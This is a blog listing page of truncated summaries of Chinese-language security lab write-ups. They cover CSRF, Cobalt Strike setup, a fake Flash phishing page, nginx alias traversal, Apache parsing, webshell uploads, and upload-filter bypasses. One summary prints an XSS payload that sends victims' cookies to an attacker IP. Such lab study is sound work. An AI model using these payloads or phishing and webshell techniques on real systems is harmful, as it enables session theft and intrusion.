摘要: 1.更改密码并使用BP抓包 2.将抓到的数据包发送到重放模块,删除referer 内容,密码成功更改;referer不影响数据包请求结果,判断存在漏洞 3.构造下面的index.html文件,其中的链接为更改密码链接 <!DOCTYPE html> <html lang="en"> <head> < 阅读全文
posted @ 2025-03-09 20:43 小圣爱学习 阅读(12) 评论(0) 推荐(0)
摘要: 1.运行Cobalt Strike服务器 sudo ./teamserver Kali-IP password 2.连接到客户端, 主机 填写服务端启动的IP, 端口 默认为50050,用户名可随意填写, 密码 为启动服务端设置的密码。点击 连接后,会有个提示信息,如果承认提示信息中的哈希值就是所要 阅读全文
posted @ 2025-03-09 17:22 小圣爱学习 阅读(31) 评论(0) 推荐(0)
摘要: 访问真实的flash 网站页面,点击查看网页源代码并将所有代码复制下来保存到index.html 2.检查并修改源代码链接。搜索href和src,将链接修改为可以访问的形式 3.新建 flash.js 文件,内容为(其中的 window.location.href 的值修改为 index.html的 阅读全文
posted @ 2025-03-04 15:42 小圣爱学习 阅读(15) 评论(0) 推荐(0)
摘要: 开启一个简易的http服务(我用了kali) 2.插入Payload <script> window.open('http://192.168.1.105:1234/?cookie='+btoa(document.cookie)) </script> 3.受害者访问攻击者插入xss代码的网页,浏览器 阅读全文
posted @ 2025-03-04 00:13 小圣爱学习 阅读(4) 评论(0) 推荐(0)
摘要: 靶场:/vulhub/nginx/insecure-configuration mistake2 Nginx在配置别名(Alias)的时候,如果忘记加/,将造成一个目录穿越漏洞。 错误的配置文件示例(原本的目的是为了让用户访问到/home/目录下的文件): location /files { ali 阅读全文
posted @ 2025-03-02 16:03 小圣爱学习 阅读(65) 评论(0) 推荐(0)
摘要: vulhub/httpd/apache_parsing_vulnerability 靶场 启动docker 靶场环境 客户端访问靶场,上传文件 test.php.png,注意文件类型 3. 访问webshell文件,并发送post消息 阅读全文
posted @ 2025-03-02 15:16 小圣爱学习 阅读(19) 评论(0) 推荐(0)
摘要: 1)环境配置 1.首先要开启日志记录。以 phpstudy 为例子,进入到Apache的配置文件目录 conf 2.编辑 httpd.conf ,找到#CustomLog "logs/access.log 并将最前方的 #号删除并重启 Apache 3.进入 Apache 的 logs 文件夹里,可 阅读全文
posted @ 2025-03-01 19:50 小圣爱学习 阅读(10) 评论(0) 推荐(0)
摘要: 根据代码可以看出,Pass-18 先保存了文件然后再判断文件是否合法,不合法就删除文件; 其他文件上传漏洞都是先判断文件是否合法然后再保存文件 因此可以知道,我们上传的不合法的文件是可以传到服务器的,在上传到服务器和文件删除之间会有一个间隙 我们可以利用这个间隙来绕过文件上传 1.准备一个文件内容为 阅读全文
posted @ 2025-02-25 22:08 小圣爱学习 阅读(33) 评论(0) 推荐(0)
摘要: 从上面的代码可以看出,首先需要绕过MIME处理上传的文件,然后再处理保存的文件名 保存的文件名如果不是数组,则把文件名以 . 分开,. 后面的部分作为后缀名用于白名单处理 因此,保存的文件名部分必须要满足白名单才行 处理完白名单后,代码并未直接使用上传的文件名作为后续操作使用,而是从新做了组合; 文 阅读全文
posted @ 2025-02-25 21:57 小圣爱学习 阅读(4) 评论(0) 推荐(0)
摘要: 上传一张gif图片,然后再将图片下载下来,比较两张图片的差异。在相同的地方插入php代码并重新上传即可;相同的位置表示不渲染的位置,插入木马后不会被删除 绕过成功 阅读全文
posted @ 2025-02-23 23:41 小圣爱学习 阅读(9) 评论(0) 推荐(0)